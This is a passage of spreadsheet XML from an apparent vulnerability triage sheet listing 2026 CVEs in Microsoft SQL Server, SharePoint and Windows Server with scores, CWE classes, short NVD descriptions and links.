      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67384</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67385</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67388</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K33" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67631</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67638</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67639</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67642</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67643</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68775</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68786</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69266</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69268</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69273</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69282</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69461</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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5" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69464</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69465</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
